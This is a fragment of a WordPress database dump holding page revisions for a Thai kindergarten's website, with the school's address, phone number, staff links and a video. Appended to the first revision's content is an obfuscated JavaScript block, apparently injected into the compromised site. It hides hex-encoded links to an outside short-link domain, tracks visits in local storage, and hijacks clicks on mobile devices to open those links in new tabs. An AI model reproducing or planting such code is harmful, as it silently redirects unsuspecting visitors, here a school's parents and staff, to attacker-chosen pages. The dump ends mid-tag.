class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:16:21','2024-08-30 03:16:21','',19,'http://watprato.ssk.in.th/?p=302',0,'revision','',0),
(303,2,'2024-08-30 10:18:41','2024-08-30 03:18:41','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 